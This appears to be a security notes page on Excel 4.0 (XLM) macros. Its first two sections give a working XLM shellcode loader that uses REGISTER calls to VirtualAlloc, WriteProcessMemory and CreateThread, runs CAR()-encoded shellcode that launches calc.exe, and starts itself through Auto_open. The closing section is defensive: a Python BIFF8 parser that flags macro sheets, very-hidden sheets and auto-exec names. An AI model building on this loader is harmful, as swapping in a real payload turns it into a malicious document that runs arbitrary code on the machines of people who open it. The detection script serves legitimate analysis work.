Excel 4.0 macros (XLM) became the default macro language when Excel 4.0 was released in 1992. Current Microsoft Office versions still support Excel 4.0 macros.

1. Inserting an Excel 4.0 macro in Excel

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/12b7fdbc-9cf1-4b91-bfc2-843205b40cf0/Untitled.png

Create a new macro sheet, in which XLM macros can be entered. In a cell, enter the formula =EXEC("calc.exe")

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dbae6ecd-8f29-46eb-962d-b33a242994d7/Untitled.png

To make the macro run automatically when the workbook is opened, rename the first cell of the macro to Auto_open.

2. Calling APIs from an Excel macro

This is done with the REGISTER and CALL functions:

REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

A shellcode execution example:

https://gist.github.com/Arno0x/17d1705ecfc945088579c84994a652d3

BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL

1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"

================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
================================================================================

=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)
=SELECTIONNER(B1:B50;B1)
=POSER.VALEUR(C1;0)
=TANT.QUE(CELLULE.ACTIVE()<>"END")
=POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE()))
=WProcessMemory(-1; A4 + (C1 * 255); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0)
=POSER.VALEUR(C1; C1 +1)
=SELECTIONNER(;"L(1)C")
=SUIVANT()
=CThread(0;0;A4;0;0;0)
=ARRETER()

================================================================================
In the Macro1 worksheet, paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe):
================================================================================
=CAR(217)&CAR(238)&CAR(184)&CAR(239)&CAR(216)&CAR(65)&CAR(149)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(95)&CAR(49)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(199)&CAR(4)&CAR(49)&CAR(71)&CAR(20)&CAR(3)&CAR(71)&CAR(251)&CAR(58)&CAR(180)&CAR(105)&CAR(235)&CAR(57)&CAR(55)&CAR(146)&CAR(235)&CAR(93)&CAR(177)&CAR(119)&CAR(218)&CAR(93)&CAR(165)&CAR(252)&CAR(76)&CAR(110)&CAR(173)&CAR(81)&CAR(96)&CAR(5)&CAR(227)&CAR(65)&CAR(243)&CAR(107)&CAR(44)&CAR(101)&CAR(180)&CAR(198)&CAR(10)&CAR(72)&CAR(69)&CAR(122)&CAR(110)&CAR(203)&CAR(197)&CAR(129)&CAR(163)&CAR(43)&CAR(244)&CAR(73)&CAR(182)&CAR(42)&CAR(49)&CAR(183)&CAR(59)&CAR(126)&CAR(234)&CAR(179)&CAR(238)&CAR(111)&CAR(159)&CAR(142)&CAR(50)&CAR(27)&CAR(211)&CAR(31)&CAR(51)&CAR(248)&CAR(163)&CAR(30)&CAR(18)&CAR(175)&CAR(184)&CAR(120)&CAR(180)&CAR(81)&CAR(109)&CAR(241)&CAR(253)&CAR(73)&CAR(114)&CAR(60)&CAR(183)&CAR(226)&CAR(64)&CAR(202)&CAR(70)&CAR(35)&CAR(153)&CAR(51)&CAR(228)&CAR(10)&CAR(22)&CAR(198)&CAR(244)&CAR(75)&CAR(144)&CAR(57)&CAR(131)&CAR(165)&CAR(227)&CAR(196)&CAR(148)&CAR(113)&CAR(158)&CAR(18)&CAR(16)&CAR(98)&CAR(56)&CAR(208)&CAR(130)&CAR(78)&CAR(185)&CAR(53)&CAR(84)&CAR(4)&CAR(181)&CAR(242)&CAR(18)&CAR(66)&CAR(217)&CAR(5)&CAR(246)&CAR(248)&CAR(229)&CAR(142)&CAR(249)&CAR(46)&CAR(108)&CAR(212)&CAR(221)&CAR(234)&CAR(53)&CAR(142)&CAR(124)&CAR(170)&CAR(147)&CAR(97)&CAR(128)&CAR(172)&CAR(124)&CAR(221)&CAR(36)&CAR(166)&CAR(144)&CAR(10)&CAR(85)&CAR(229)&CAR(254)&CAR(205)&CAR(235)&CAR(147)&CAR(76)&CAR(205)&CAR(243)&CAR(155)&CAR(224)&CAR(166)&CAR(194)&CAR(16)&CAR(111)&CAR(176)&CAR(218)&CAR(242)&CAR(212)&CAR(78)&CAR(145)&CAR(95)&CAR(124)&CAR(199)&CAR(124)&CAR(10)&CAR(61)&CAR(138)&CAR(126)&CAR(224)&CAR(1)&CAR(179)&CAR(252)&CAR(1)&CAR(249)&CAR(64)&CAR(28)&CAR(96)&CAR(252)&CAR(13)&CAR(154)&CAR(152)&CAR(140)&CAR(30)&CAR(79)&CAR(159)&CAR(35)&CAR(30)&CAR(90)&CAR(252)&CAR(162)&CAR(140)&CAR(6)&CAR(45)&CAR(65)&CAR(53)&CAR(172)&CAR(49)
END

3. Deeply hidden (very hidden) sheets

https://blog.didierstevens.com/programs/oledump-py/

https://github.com/DidierStevens/DidierStevensSuite/blob/master/plugin_biff.py

oledump.py is a tool for analyzing OLE files and can be used to inspect .xls workbooks.

Excel 4.0 macro sheets and their auto-execute names are stored as BIFF records in the Workbook stream; use the plugin_biff.py plugin to view them.
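As an added example (not code from this page nor from Didier Stevens' oledump/plugin_biff), the following Python script parses the BIFF8 globals substream of a Workbook stream and reports the two things a triage analyst looks for after sections 1 and 3 above: BOUNDSHEET records whose sheet type is "Excel 4.0 macro sheet" or whose visibility is "very hidden", and built-in NAME (Lbl) records such as Auto_Open. Record ids and field layouts follow the MS-XLS specification (BOUNDSHEET 0x0085, NAME 0x0018, BOF 0x0809, EOF 0x000A) as I understand it; the sample stream is constructed inline so the script runs offline. On a real .xls, feed it the raw Workbook stream, for example one dumped with `oledump.py -s <n> -d sample.xls > Workbook.bin`.

```python
import struct
import sys

# BIFF8 record ids from MS-XLS (assumed correct for this example)
REC_BOF = 0x0809
REC_EOF = 0x000A
REC_BOUNDSHEET = 0x0085
REC_NAME = 0x0018

SHEET_TYPES = {0x00: "worksheet", 0x01: "xlm_macro", 0x02: "chart", 0x06: "vb_module"}
VISIBILITY = {0: "visible", 1: "hidden", 2: "veryhidden"}
# Built-in defined-name indices (MS-XLS Lbl record); Auto_Open is 0x01
BUILTIN_NAMES = {0x00: "Consolidate_Area", 0x01: "Auto_Open", 0x02: "Auto_Close",
                 0x06: "Print_Area", 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
AUTO_EXEC = {"Auto_Open", "Auto_Close", "Auto_Activate", "Auto_Deactivate"}


def iter_records(stream: bytes):
    """Yield (record_type, payload) for the globals substream, i.e. up to the first EOF."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        payload = stream[off + 4: off + 4 + rlen]
        off += 4 + rlen
        yield rtype, payload
        if rtype == REC_EOF:
            break


def _short_string(buf: bytes, cch: int) -> str:
    """XLUnicodeStringNoCch: 1 flags byte (bit 0 = 16-bit chars) followed by cch characters."""
    if buf[0] & 0x01:
        return buf[1:1 + 2 * cch].decode("utf-16-le")
    return buf[1:1 + cch].decode("latin-1")


def parse_boundsheet(payload: bytes) -> dict:
    """BoundSheet8: lbPlyPos(4) | grbit(2): hsState in bits 0-1, dt (sheet type) in bits 8-15 | cch | name."""
    lb_ply_pos, grbit = struct.unpack_from("<IH", payload, 0)
    cch = payload[6]
    return {"name": _short_string(payload[7:], cch),
            "visibility": VISIBILITY.get(grbit & 0x03, "unknown"),
            "type": SHEET_TYPES.get((grbit >> 8) & 0xFF, "unknown"),
            "offset": lb_ply_pos}


def parse_name(payload: bytes) -> dict:
    """Lbl: grbit(2) chKey(1) cch(1) cce(2) unused(2) itab(2) reserved(4) name ... ; fBuiltin = 0x0020."""
    grbit, _chkey, cch, _cce, _unused, itab = struct.unpack_from("<HBBHHH", payload, 0)
    builtin = bool(grbit & 0x0020)
    if builtin:
        idx = payload[15]  # byte 14 is the string flags byte, byte 15 the built-in index
        name = BUILTIN_NAMES.get(idx, f"builtin_0x{idx:02x}")
    else:
        name = _short_string(payload[14:], cch)
    # itab is 1-based into the BOUNDSHEET list, 0 means workbook-global
    return {"name": name, "builtin": builtin, "hidden": bool(grbit & 0x0001), "sheet_index": itab}


def scan_workbook(stream: bytes) -> dict:
    """Collect sheets and defined names, then flag XLM sheets, very-hidden sheets and auto-exec names."""
    sheets, names = [], []
    for rtype, payload in iter_records(stream):
        if rtype == REC_BOUNDSHEET:
            sheets.append(parse_boundsheet(payload))
        elif rtype == REC_NAME:
            names.append(parse_name(payload))
    findings = []
    for i, s in enumerate(sheets, start=1):
        if s["type"] == "xlm_macro":
            findings.append(f"sheet {i} '{s['name']}' is an Excel 4.0 macro sheet ({s['visibility']})")
        elif s["visibility"] == "veryhidden":
            findings.append(f"sheet {i} '{s['name']}' is very hidden (only unhideable via VBA/object model)")
    for n in names:
        if n["name"] in AUTO_EXEC:
            findings.append(f"auto-exec name {n['name']} bound to sheet index {n['sheet_index']}")
    return {"sheets": sheets, "names": names, "findings": findings}


# --- constructed sample stream (not a real file) ---------------------------------
def _rec(rtype: int, payload: bytes) -> bytes:
    return struct.pack("<HH", rtype, len(payload)) + payload


def _boundsheet(name: str, visibility: int, sheet_type: int) -> bytes:
    raw = name.encode("latin-1")
    return _rec(REC_BOUNDSHEET, struct.pack("<IH", 0, visibility | (sheet_type << 8)) + bytes([len(raw), 0x00]) + raw)


def _builtin_name(idx: int, itab: int) -> bytes:
    header = struct.pack("<HBBHHH", 0x0020, 0, 1, 0, 0, itab) + b"\x00" * 4
    return _rec(REC_NAME, header + bytes([0x00, idx]))


def build_sample(with_macro: bool = True) -> bytes:
    """Globals substream: BOF, a visible worksheet, optionally a very-hidden XLM sheet + Auto_Open, EOF."""
    bof = _rec(REC_BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0, 0, 0, 0))
    body = _boundsheet("Sheet1", 0, 0x00)
    if with_macro:
        body += _boundsheet("Macro1", 2, 0x01) + _builtin_name(0x01, 2)
    return bof + body + _rec(REC_EOF, b"")


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for line in scan_workbook(data)["findings"] or ["no XLM / very-hidden / auto-exec indicators"]:
        print(line)
```

The scan stops at the first EOF because BOUNDSHEET and NAME records live in the workbook globals substream that precedes the per-sheet substreams; the per-sheet formula cells (where EXEC, REGISTER and CALL would appear) are what plugin_biff.py decodes in its own output.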